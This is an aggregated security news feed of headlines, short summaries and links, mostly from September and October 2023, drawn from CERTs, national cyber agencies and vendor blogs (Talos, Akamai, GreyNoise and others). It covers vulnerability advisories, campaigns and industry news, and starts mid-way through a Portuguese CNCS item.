Ciberespaço, na resposta aos aspetos mais críticos na área da cibersegurança, em Portugal. A 2.ª edição da IT Security Conference contou com 40 oradores e mais de 350 inscritos. War & Law: The Future of Conflict Foi o título da conferência organizada por Felipe Pathé Duarte e Laura Ínigo Alvarez, no âmbito do 50.º aniversário da Universidade Nova de Lisboa, que decorreu a 12 de outubro, no Centro Cultural de Belém, na qual o coordenador do CNCS, Lino Santos, fez parte do painel dedicado ao tema “Digital tech and hybrid warfare”. Lino Santos falou da necessidade de integrar a Inteligência Artificial na cibersegurança e realçou a densidade digital como fator que tem conduzido a um aumento dos cibercrimes. Para o coordenador do CNCS a sociedade tem dificuldades em lidar com as atuais tecnologias, resultados da falta de especialistas e de competências por parte dos recursos humanos das organizações. A conferência, iniciativa da Universidade Nova de Lisboa, contou com a participação de membros do Governo e das Forças Armadas, académicos e especialistas internacionais. O objetivo foi abordar as tendências do conflito armado, considerando quatro pilares: tecnologias digitais, alterações climáticas, privatização de conflitos e invasões.

https://dyn.cncs.gov.pt/pt/detalhe/art/135799/cncs-na-it-security-conference-e-na-conferencia-war-law-the-future-of-conflict
Ineffective Security, AI Confusion and Identity Attacks - 3 Themes from Gartner Security and Risk Summit by Tiffany Nip
2023-10-12T00:00:00Z | 1697068800

Insight and key takeaways from Gartner Security and Risk Summit 2023

https://www.vectra.ai/blog/ineffective-security-ai-confusion-and-identity-attacks-three-themes-from-gartner-security-and-risk-summit-2023
The First 72 Hours of the Israel-Hamas War: Hamas and PIJ Activity on Telegram
2023-10-11T22:11:07Z | 1697062267

Analyzing Telegram's role in facilitating communication and strategy for Hamas and PIJ during the initial days of the Israel-Hamas War. The post The First 72 Hours of the Israel-Hamas War: Hamas and PIJ Activity on Telegram appeared first on Flashpoint.

https://flashpoint.io/blog/israel-hamas-war-first-72-hours-telegram/
An Open Partnership Ecosystem for Building Solutions at the Edge
2023-10-11T13:00:00Z | 1697029200

https://www.akamai.com/blog/cloud/2023/oct/an-open-partnership-ecosystem-for-building-solutions-at-the-edge
The National Cyber Security Centre Finland’s weekly review – 40/2023
2023-10-11T12:11:44Z | 1697026304

This week, we take a look at the new Traficom regulation that recently entered into full effect, imposing new obligations on telecommunications operators to prevent caller ID spoofing. Other topics this week include QR code phishing, the progress of the national implementation of the NIS2 Directive and the successful Ketjutonttu campaign.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-402023
The National Cyber Security Centre Finland’s weekly review – 40/2023
2023-10-11T12:11:44Z | 1697026304

This week, we take a look at the new Traficom regulation that recently entered into full effect, imposing new obligations on telecommunications operators to prevent caller ID spoofing. Other topics this week include QR code phishing, the progress of the national implementation of the NIS2 Directive and the successful Ketjutonttu campaign.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-402023
Frank Rauch Discusses the Impact Partners Have on Cato’s Success
2023-10-11T09:49:45Z | 1697017785

January 2023, Frank Rauch took on the pivotal role of Global Channel Chief at Cato Networks. This appointment marked a significant moment in Cato’s ongoing commitment to its global channel partner program. To shed light on the program’s value and its role in Cato’s success, we sat down with Frank and asked him to share... The post Frank Rauch Discusses the Impact Partners Have on Cato’s Success appeared first on Cato Networks.

https://www.catonetworks.com/blog/frank-rauch-discusses-the-impact-partners-have-on-catos-success/
High Threat Security Alert (A23-10-08): Multiple Vulnerabilities in Microsoft Products (October 2023)
2023-10-11T04:00:00Z | 1696996800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-09): Multiple Vulnerabilities in Google Chrome
2023-10-11T04:00:00Z | 1696996800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-10): Multiple Vulnerabilities in Apache Tomcat
2023-10-11T04:00:00Z | 1696996800

The Apache Software Foundation released a security update to address multiple vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-10-11): Multiple Vulnerabilities in Citrix NetScaler ADC and Citrix NetScaler Gateway
2023-10-11T04:00:00Z | 1696996800

Citrix released a security advisory to address multiple vulnerabilities in Citrix NetScaler ADC and Citrix NetScaler Gateway.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-12): Multiple Vulnerabilities in Fortinet Products
2023-10-11T04:00:00Z | 1696996800

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-13): Multiple Vulnerabilities in F5 Products
2023-10-11T04:00:00Z | 1696996800

F5 has published security advisories to address multiple vulnerabilities in F5 devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Yifan YF325 httpd nvram.cgi authentication bypass vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1762
Yifan YF325 httpd manage_request stack-based buffer overflow vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1766
Yifan YF325 httpd manage_post stack-based buffer overflow vulnerabilities
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1787
Yifan YF325 httpd do_wds stack-based buffer overflow vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1765
peplink Surf SOHO HW1 admin.cgi USSD_send OS command injection vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1780
Yifan YF325 httpd next_page buffer overflow vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1761
Yifan YF325 validate.so diag_ping_start command execution vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1767
peplink Surf SOHO HW1 admin.cgi MVPN_trial_init OS command injection vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1779
peplink Surf SOHO HW1 data.cgi xfer_dns OS command injection vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1778
Yifan YF325 httpd gwcfg.cgi get stack-based buffer overflow vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1764
peplink Surf SOHO HW1 upload_brand.cgi cross-site scripting (XSS) vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1781
Yifan YF325 httpd debug credentials leftover debug code vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1752
peplink Surf SOHO HW1 api.cgi cmd.mvpn.x509.write OS command injection vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1782
Yifan YF325 gwcfg_cgi_set_manage_post_data stack-based buffer overflow vulnerabilities
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1788
Yifan YF325 libutils.so nvram_restore stack-based buffer overflow vulnerability
2023-10-11T00:00:00Z | 1696982400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1763
CVE-2023-38545: So you cURL, but will you cIRL?
2023-10-11T00:00:00Z | 1696982400

On October 11th, 2023, a heap-based buffer overflow in curl was disclosed under the identifier CVE-2023-38545. The vulnerability affects libcurl 7.69.0 to and including 8.3.0. Vulnerable versions of libcurl may be embedded in existing applications. However, to reach the vulnerable code path, the application must be configured to utilize one of the SOCKS5 proxy modes and attempt to resolve a hostname with extraneous length.

https://www.greynoise.io/blog/cve-2023-38545-so-you-curl-but-will-you-cirl
Vulnerability in SmodBIP software
2023-10-10T19:00:00Z | 1696964400

Cross-Site Request Forgery vulnerability has been found in SmodBIP software (CVE-2023-4837).

https://cert.pl/en/posts/2023/10/CVE-2023-4837/
The 2023 Akamai Partner Award Winners: A Spotlight on Success
2023-10-10T13:00:00Z | 1696942800

https://www.akamai.com/blog/partners/2023/oct/2023-akamai-partner-award-winners
CVE-2023-22515: Critical Privilege Escalation Vulnerability in Atlassian's Confluence
2023-10-10T00:00:00Z | 1696896000

A critical zero-day vulnerability has recently been discovered in the Confluence Data Center and Server. The vulnerability, known as CVE-2023-22515 and scored a CVSS 10 out of 10, is a privilege escalation vulnerability that allows external attackers to exploit the system and create administrator accounts that can be used to access Confluence instances. Check out this blog for all the details GreyNoise has compiled on this vulnerability.

https://www.greynoise.io/blog/cve-2023-22515-critical-privilege-escalation-vulnerability-in-atlassians-confluence
The Art of Concealment: A New Magecart Campaign That?s Abusing 404 Pages
2023-10-09T14:00:00Z | 1696860000

https://www.akamai.com/blog/security-research/2023/oct/magecart-new-technique-404-pages-skimmer
Septembrikuu möödus küberruumis ummistusrünnete tähe all
2023-10-09T13:05:21Z | 1696856721

Valminud on RIA septembrikuu ülevaade olukorrast küberruumis, millest saab muu hulgas lugeda Eestit tabanud ummistusrünnete lainest, jätkuvalt levivatest õngitsustest ning Venemaa riikliku taustaga küberrühmituste intensiivistunud tegevusest Ukraina vastu.

https://ria.ee/uudised/septembrikuu-moodus-kuberruumis-ummistusrunnete-tahe-all
Cato Networks Powers Ahead: Fuels Innovation with TAG Heuer Porsche Formula E Team
2023-10-09T09:43:35Z | 1696844615

In the fast-paced world of auto racing, where technology and precision come together in a symphony of speed, Cato Networks made its mark as the official SASE sponsor of the TAG Heuer Porsche Formula E Team. As the engines quietly ran and tires screeched at the 2023 Southwire Portland E-Prix, held at the iconic Portland... The post Cato Networks Powers Ahead: Fuels Innovation with TAG Heuer Porsche Formula E Team appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-networks-powers-ahead-fuels-innovation-with-tag-heuer-porsche-formula-e-team/
Kvartaliülevaade: segadus terviseandmetes, kelmused ja näotustamised
2023-10-09T08:27:33Z | 1696840053

RIA kolmanda kvartali ülevaates on muu hulgas juttu patsientide terviseandmetes segadust põhjustanud tarkvaraveast, veebilehtede ummistusrünnetele lisandunud näotustamistest ning Facebook Marketplace’is levivatest kelmustest.

https://ria.ee/uudised/kvartaliulevaade-segadus-terviseandmetes-kelmused-ja-naotustamised
Security Alert (A23-10-07): Multiple Vulnerabilities in QNAP Products
2023-10-09T04:00:00Z | 1696824000

QNAP has published a security advisory to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
The Defenders’ Dilemma – A conversation with SANS on the spiral of more by Mark Wojtasiak
2023-10-09T00:00:00Z | 1696809600

Explore the challenges confronting Security Operations Center (SOC) teams, addressing the surge in alert volumes and advocating for a redefined perspective on threat detection effectiveness.

https://www.vectra.ai/blog/the-defenders-dilemma-a-conversation-with-sans-on-the-spiral-of-more
Cato Protects Against Atlassian Confluence Server Exploits (CVE-2023-22515)
2023-10-06T14:38:33Z | 1696603113

A new critical vulnerability has been disclosed by Atlassian in a security advisory published on October 4th 2023 in its on-premise Confluence Data Center and Server product. A privilege escalation vulnerability through which attackers may exploit a vulnerable endpoint in internet-facing Confluence instances to create unauthorized Confluence administrator accounts and gain access to the Confluence... The post Cato Protects Against Atlassian Confluence Server Exploits (CVE-2023-22515) appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-protects-against-atlassian-confluence-server-exploits-cve-2023-22515/
The campaign identified and corrected cyber risks related to supply chains
2023-10-06T07:32:01Z | 1696577521

The Ketjutonttu campaign of the National Cyber Security Centre Finland at Traficom improved the information security of the Finnish business sector by identifying and correcting risks in their supply chains. 150 organisations and companies participated in the campaign funded by the National Emergency Supply Agency's Digital Security 2030 program. An average of 35 suppliers were identified per individual participant. A total of 2,312 suppliers were inspected during the campaign, and they were offered vulnerability reports and help with repairs. During the campaign, 856 information security observations were reported.

https://www.kyberturvallisuuskeskus.fi/en/news/campaign-identified-and-corrected-cyber-risks-related-supply-chains
The campaign identified and corrected cyber risks related to supply chains
2023-10-06T07:32:01Z | 1696577521

The Ketjutonttu campaign of the National Cyber Security Centre Finland at Traficom improved the information security of the Finnish business sector by identifying and correcting risks in their supply chains. 150 organisations and companies participated in the campaign funded by the National Emergency Supply Agency's Digital Security 2030 program. An average of 35 suppliers were identified per individual participant. A total of 2,312 suppliers were inspected during the campaign, and they were offered vulnerability reports and help with repairs. During the campaign, 856 information security observations were reported.

https://www.kyberturvallisuuskeskus.fi/en/news/campaign-identified-and-corrected-cyber-risks-related-supply-chains
The National Cyber Security Centre Finland’s weekly review – 39/2023
2023-10-06T07:23:36Z | 1696577016

This week, the customers of a Finnish bank have been bombarded with thousands of phishing messages aimed at getting them to enter their bank credentials on spoofed websites created by scammers. We also provide valuable operating instructions for cloud incident response.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-392023
The National Cyber Security Centre Finland’s weekly review – 39/2023
2023-10-06T07:23:36Z | 1696577016

This week, the customers of a Finnish bank have been bombarded with thousands of phishing messages aimed at getting them to enter their bank credentials on spoofed websites created by scammers. We also provide valuable operating instructions for cloud incident response.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-392023
Webkit MediaRecorder API stopRecording use-after-free vulnerability
2023-10-06T00:00:00Z | 1696550400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1831
Vectra AI at CrowdStrike’s Fal.Con – Bringing a true XDR solution by Zoey Chu
2023-10-06T00:00:00Z | 1696550400

Just a week before the conference MGM Resorts and Caesar’s Palace suffered major security breaches. Read how Vectra AI’s integration with CrowdStrike can potentially provide a powerful solution to security breaches like those.

https://www.vectra.ai/blog/vectra-ai-at-crowdstrikes-fal-con-bringing-a-true-xdr-solution
Put Your Best Foot Forward: The Impact of Sneaker Bots on Holiday Shopping
2023-10-05T14:00:00Z | 1696514400

https://www.akamai.com/blog/security-research/2023/oct/cam-sneaker-bots-and-credential-stuffing-this-holiday-season
Taking Action on Climate Change at Climate Week NYC 2023
2023-10-05T13:00:00Z | 1696510800

https://www.akamai.com/blog/sustainability/2023/oct/taking-action-at-climate-week-nyc-2023
Introducing invariant development as a service
2023-10-05T12:00:52Z | 1696507252

Understanding and rigorously testing system invariants are essential aspects of developing robust smart contracts. Invariants are facts about the protocol that should remain true no matter what happens. Defining and testing these invariants allows developers to prevent the introduction of bugs and make their code more robust in the long term. However, it is difficult […]

https://blog.trailofbits.com/2023/10/05/introducing-invariant-development-as-a-service/
Thinking of Renewing Your SD-WAN Contract? You’ve Come to the Right Place
2023-10-05T11:07:36Z | 1696504056

The post Thinking of Renewing Your SD-WAN Contract? You’ve Come to the Right Place appeared first on Cato Networks.

https://www.catonetworks.com/resources/dont-renew-your-sd-wan-contract-before-reading-this/
Guidance on the Recent Critical libwebp and libvpx Vulnerabilities
2023-10-05T07:00:00Z | 1696489200

https://www.akamai.com/blog/security-research/2023/oct/guidance-on-critical-chrome-vulnerabilities-libwebp-and-libvpx
High Threat Security Alert (A23-10-05): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-10-05T04:00:00Z | 1696478400

Apple has released iOS 17.0.3 and iPadOS 17.0.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-06): Vulnerability in Microsoft Edge
2023-10-05T04:00:00Z | 1696478400

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Prioritizing the Pharmaceutical Supply Chain for Healthcare Resiliency
2023-10-04T13:00:00Z | 1696424400

https://www.akamai.com/blog/edge/2023/oct/prioritizing-the-pharmaceutical-supply-chain-for-healthcare-resiliency
Cisco Named An Official Technology Partner of the New England Patriots
2023-10-04T12:00:00Z | 1696420800

Cisco has been named An Official Technology Partner of the New England Patriots and Gillette Stadium. Cisco’s IP Fabric for Media solution allows for the secure and efficient delivery of 4K content to fans everywhere, both in-stadium and via broadcast. This announcement builds on Cisco’s existing relationship with the NFL to deliver seamless, secure connectivity to the league, teams, stadiums and partners. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m10/cisco-named-an-official-technology-partner-of-the-new-england-patriots.html
Vulnerability in UptimeDC software
2023-10-04T11:00:00Z | 1696417200

CERT Poland has received a report about vulnerability in the UptimeDC software and assigned it the number CVE-2023-4997.

https://cert.pl/en/posts/2023/10/CVE-2023-4997/
Security Alert (A23-10-03): Vulnerability in Google Chrome
2023-10-04T04:00:00Z | 1696392000

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-04): Vulnerability in Linux Operating Systems
2023-10-04T04:00:00Z | 1696392000

A local privilege escalation vulnerability is found in the Linux GNU C Library (glibc) version 2.34 while processing an environment variable called GLIBC_TUNABLES.

https://www.govcert.gov.hk/en/alerts_detail.php
How to build custom scanners for web security research automation
2023-10-03T13:34:47Z | 1696340087

In this post, I'll share my approach to developing custom automation to aid research into under-appreciated attack classes and (hopefully) push the boundaries of web security. As a worked example, I'l

https://portswigger.net/research/how-to-build-custom-scanners-for-web-security-research-automation
Client-Side Protection & Compliance: Fight Threats, Help Meet PCI DSS v4
2023-10-03T13:00:00Z | 1696338000

https://www.akamai.com/blog/security/2023/sep/fight-threats-help-meet-pci-dss-v4
Nimelisi @eesti.ee lõpuga e-posti aadresse saab kasutada veel kuni kuu lõpuni
2023-10-03T09:11:15Z | 1696324275

Riigi Infosüsteemi Amet (RIA) tuletab meelde, et alates 1. novembrist kaovad kasutusest erakirjavahetuseks loodud eesnimi.perekonnanimi@eesti.ee ja ettevõttenimi@eesti.ee e-posti aadressid.

https://ria.ee/uudised/nimelisi-eestiee-lopuga-e-posti-aadresse-saab-kasutada-veel-kuni-kuu-lopuni
High Threat Security Alert (A23-10-01): Multiple Vulnerabilities in Microsoft Edge
2023-10-03T04:00:00Z | 1696305600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-10-02): Multiple Vulnerabilities in Android
2023-10-03T04:00:00Z | 1696305600

Google has released Android Security Bulletin October 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Outubro é o Mês da Cibersegurança
2023-10-03T00:00:00Z | 1696291200

#BeSmarterThanAHacker é o mote que serve de contexto para a campanha associada ao Mês Europeu da Cibersegurança (European Cybersecurity Month – ECSM). Uma iniciativa anual celebrada na União Europeia, organizada em parceria com a Agência Europeia para a Segurança das Redes e Informação (ENISA) e a Comissão Europeia, à qual o Centro Nacional de Cibersegurança se associa, e que promove nos Estados Membros a cibersegurança entre cidadãos e organizações, assim como o fornecimento de informações sobre segurança online, através da sensibilização e da partilha de boas práticas.   Este ano, à semelhança dos anos anteriores, o mote para as comemorações do Mês visa implementar as boas práticas para a utilização do ciberespaço. Desta forma, a campanha #BeSmaterThanAHacker tem como objetivo sensibilizar os cidadãos e as empresas para os comportamentos que devem adotar no que respeita à segurança online, prevenindo eventuais ameaças decorrentes da utilização do ciberespaço, com especial foco nos métodos de Engenharia Social, Phishing e o seu impacto na cibersegurança.   Ao longo do mês de outubro decorrem centenas de eventos e atividades distribuídos por toda a Europa, desde Conferências, Workshops e Campanhas online, sendo estes alguns dos formatos escolhidos para promover o mês da cibersegurança pelo país.   Portugal assinala outubro como o Mês das Competências Digitais como forma de destacar diversos projetos, programas e iniciativas que promovem a capacitação digital dos portugueses, no âmbito do INCoDe.2030.   O European Cybersecurity Challenge é uma das ações inseridas nas comemorações que vai juntar, entre 24 e 27 de outubro, na Noruega, 35 equipas de vários países, entre os quais Portugal, que vão ser desafiadas a resolver problemas relacionados com a segurança informática em vários domínios: de ataque e defesa a segurança web, passando por segurança móvel, hardware, criptografia, engenharia reversa ou forense. A Team Portugal conta com 12 jovens talentos (10 efetivos e 2 suplentes), dos escalões júnior e sénior, selecionados no âmbito da iniciativa Cybersecurity Challenge PT, que resulta da cooperação entre o Centro Nacional de Cibersegurança, o Instituto Superior Técnico (IST), a Universidade do Porto e a AP2SI. O Cybersecurity Challenge PT está enquadrado num programa de formação e treino abrangente, que pretende reforçar o país, na área da cibersegurança e segurança da informação, atraindo desde cedo jovens dos ensinos secundário e superior.   Relembramos que se encontra online a campanha nacional Internet Segura: #LerAntesClicarDepois, com o propósito de reforçar, junto de todas as pessoas e organizações, a informação sobre o bom uso do ciberespaço. Esta campanha, fruto de um trabalho conjunto com o Conselho Superior de Segurança do Ciberespaço, é composta por uma brochura informativa, cartões com mensagens de alerta e por um kit de vídeos curtos, que tratam temas variados, desde o uso das palavras-passe, as compras online, o cyberbullying, até aos cuidados a ter com as redes sociais, passando pelos perigos a considerar em relação aos ataques através de emails, SMS ou telefonemas.   Acompanhe estas campanhas e outras iniciativas através das Redes Sociais e do site do Centro Nacional de Cibersegurança.

https://dyn.cncs.gov.pt/pt/detalhe/art/135797/outubro-e-o-mes-da-ciberseguranca
Küberrünnak ettevõtte vastu võib ohustada ka töötajaid, kliente ja äripartnereid
2023-10-02T07:00:15Z | 1696230015

Kaks hiljutist uuringut näitavad, et Eesti väikese ja keskmise suurusega ettevõtted (VKEd) pööravad küberturvalisusele oluliselt vähem tähelepanu kui suurfirmad ning võivad seetõttu langeda kergemini ka küberrünnete ohvriks.

https://ria.ee/uudised/kuberrunnak-ettevotte-vastu-voib-ohustada-ka-tootajaid-kliente-ja-aripartnereid
Data breaches and phishing caused the cyber weather in August to be stormy
2023-10-02T06:55:27Z | 1696229727

In August, the cyber weather was autumnally rainy. Phishing was very active, and the Citrix NetScaler vulnerability led to several data breaches in Finland. Taking advantage of the vulnerability seemed to be quick and automated. Updates should be installed as soon as possible whenever they are available.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2023
Data breaches and phishing caused the cyber weather in August to be stormy
2023-10-02T06:55:27Z | 1696229727

In August, the cyber weather was autumnally rainy. Phishing was very active, and the Citrix NetScaler vulnerability led to several data breaches in Finland. Taking advantage of the vulnerability seemed to be quick and automated. Updates should be installed as soon as possible whenever they are available.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_08/2023
Introducing Sift: Automated Threat Hunting
2023-10-02T00:00:00Z | 1696204800

The blog post introduces Sift, a new tool from GreyNoise that helps threat hunters filter out noise and prioritize investigation of potentially malicious web traffic. Sift uses AI techniques like large language models to analyze HTTP requests seen across GreyNoise's sensor network and generate reports on new and relevant threats. The reports describe and analyze suspicious payloads, estimate the threat level, provide contextual tags/information on associated IPs, and suggest Suricata rules to detect similar traffic. This allows analysts to focus only on the most critical potential threats instead of sifting through millions of requests manually. Sift is currently limited to HTTP traffic but will expand to other protocols soon. The post invites readers to provide feedback on how to further develop Sift's capabilities, such as expanding historical reports, customizing for specific organizations, analyzing submitted PCAPs, and integrating additional GreyNoise data/tools.

https://www.greynoise.io/blog/introducing-sift-automated-threat-hunting
SonicWall NetExtender Pre-Logon Vulnerability
2023-09-29T17:29:28Z | 1696008568

A flaw within the SonicWall NetExtender Pre-Logon feature enables an unauthorized user to gain access to the host Windows operating system with 'SYSTEM' level privileges, leading to a local privilege escalation (LPE) vulnerability. SonicWall strongly advises SSL VPN NetExtender client users to upgrade to the latest release version. CVE: CVE-2023-44218 Last updated: Sept. 29, 2023, 5:29 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0014
SonicWall Net Extender Repair Local Privilege Escalation Vulnerability
2023-09-29T17:25:35Z | 1696008335

A local privilege escalation vulnerability in SonicWall Net Extender MSI client for Windows 10.2.336 and earlier versions allows a local low-privileged user to gain system privileges through running the repair functionality. SonicWall strongly advises SSL VPN NetExtender client users to upgrade to the latest release version. CVE: CVE-2023-44217 Last updated: Sept. 29, 2023, 5:25 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0013
Enhancing Digital User Experience in the Age of Cloud Applications: A Look at iboss Digital Experience Management
2023-09-29T16:30:43Z | 1696005043

The post Enhancing Digital User Experience in the Age of Cloud Applications: A Look at iboss Digital Experience Management appeared first on iboss.

https://www.iboss.com/blog/digital-experience-management/
High Threat Security Alert (A23-09-23): Vulnerability in Firefox
2023-09-29T04:00:00Z | 1695960000

Mozilla has published the advisory (MFSA2023-44) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Portugal participa em mais uma campanha internacional de prevenção de cibercrime — Rede InterCOP
2023-09-29T00:00:00Z | 1695945600

Durante esta última semana de setembro, Portugal esteve presente no 7.º encontro da rede de prevenção da cibercriminalidade InterCOP em Utrecht, Países Baixos.  A PJ, PSP e CNCS, trabalharam juntamente com os países da rede InterCOP na criação e implementação de uma campanha de prevenção de cibercrime da Google Ads, que estará ativa a partir de dia 2 de outubro ao nível internacional.  A rede internacional InterCOP funciona como rede de prevenção de cibercrime junto de jovens adolescentes que têm conhecimentos informáticos para cometerem crimes e, através de campanhas de comunicação internacionais simultâneas, pretende-se agir junto desta camada da população, de forma a prevenir tais ações criminosas, bem como, informá-la sobre as opções legais que podem seguir. Os objetivos do projeto passam pela promoção de diversas campanhas e atividades, bem como o estabelecimento de parcerias com o setor privado para colaboração numa campanha/evento onde se promovem encontros entre jovens hackers e as polícias de forma a realizar ações de prevenção/ethical hacking. Em Portugal, tem-se observado um crescimento do número de casos de ataques informáticos a infraestruturas críticas realizados por jovens adolescentes, não tendo estes sequer noção do impacto dos seus ataques, nem de como estes crimes poderão impactar o seu futuro (ao ter registo criminal em início de vida). A prevenção assume assim um papel fundamental, sendo este projeto uma alavanca para implementação de ações de prevenção junto desses jovens antes que seja tarde demais. O projeto conta atualmente com 27 países membros no total, sendo que a rede InterCOP é financiada pelo Fundo de Segurança Interna da UE (ISF 2023-2025) e está alinhado com o Operation Action 7.1 da prioridade EMPACT de CyberAttacks. A rede foi fundada por membros de Poliisi (polícia da Finlândia), NCA (polícia do Reino Unido), Polisen (polícia da Suécia), Politie (polícia do Reino dos Países Baixos) e PJ e PSP, de Portugal. Esteja atento a esta campanha e mantenha-se informado!  

https://dyn.cncs.gov.pt/pt/detalhe/art/135796/portugal-participa-em-mais-uma-campanha-internacional-de-prevencao-de-cibercrime-rede-intercop
A QUIC Shutdown: DoS Vulnerability in Windows Servers Running SMB over QUIC
2023-09-28T14:00:00Z | 1695909600

https://www.akamai.com/blog/security-research/2023/sep/smb-over-quic-dos-windows-servers
Security Alert (A23-09-21): Multiple Vulnerabilities in Cisco Products
2023-09-28T04:00:00Z | 1695873600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A23-09-22): Multiple Vulnerabilities in Google Chrome
2023-09-28T04:00:00Z | 1695873600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Companies’ Reliance on IT Managed Services Increases in 2023, Sector Valued at US$472 Billion Globally
2023-09-27T12:00:00Z | 1695816000

Findings from a global study commissioned by Cisco and conducted by Canalys, reveal that IT channel partners focusing on managed services are expected to see significant growth in 2023. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2023/m09/companies-reliance-on-it-managed-services-increases-in-2023-sector-valued-at-us-472-billion-globally.html
The High Stakes of Innovation: Attack Trends in Financial Services
2023-09-27T05:00:00Z | 1695790800

https://www.akamai.com/blog/security-research/attack-trends-in-financial-services
Security Alert (A23-09-20): Multiple Vulnerabilities in Firefox
2023-09-27T04:00:00Z | 1695787200

Mozilla has published the advisories (MFSA2023-41 and MFSA2023-42) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Essential steps to evaluate the Risk Profile of a Secure Services Edge (SSE) Provider
2023-09-26T12:19:17Z | 1695730757

Introduction Businesses have increasingly turned to Secure Services Edge (SSE) to secure their digital assets and data, as they undergo digital transformation. SSE secures the network edge to ensure data privacy and protect against cyber threats, using a cloud-delivered SaaS infrastructure from a third-party cybersecurity provider. SSE has brought numerous advantages to companies who needed... The post Essential steps to evaluate the Risk Profile of a Secure Services Edge (SSE) Provider appeared first on Cato Networks.

https://www.catonetworks.com/blog/essential-steps-to-evaluate-the-risk-profile-of-a-secure-services-edge-sse-provider/
Hancom Office 2020 HWord footerr use-after-free vulnerability
2023-09-26T00:00:00Z | 1695686400

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1759
Pursuing Cyber Resiliency So Healthcare Can Weather the Worst Storms
2023-09-25T13:00:00Z | 1695646800

https://www.akamai.com/blog/security/2023/sep/pursuing-cyber-resiliency-so-healthcare-can-weather-the-worst-storms
Pitfalls of relying on eBPF for security monitoring (and some solutions)
2023-09-25T11:00:47Z | 1695639647

eBPF (extended Berkeley Packet Filter) has emerged as the de facto Linux standard for security monitoring and endpoint observability. It is used by technologies such as BPFTrace, Cilium, Pixie, Sysdig, and Falco due to its low overhead and its versatility. There is, however, a dark (but open) secret: eBPF was never intended […]

https://blog.trailofbits.com/2023/09/25/pitfalls-of-relying-on-ebpf-for-security-monitoring-and-some-solutions/
Accusoft ImageGear create_png_object heap-based buffer overflow vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1749
Accusoft ImageGear tif_parse_sub_IFD use-after-free vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1830
Accusoft ImageGear tiff_planar_adobe out-of-bounds write vulnerability
2023-09-25T00:00:00Z | 1695600000

https://talosintelligence.com/vulnerability_reports/TALOS-2023-1750
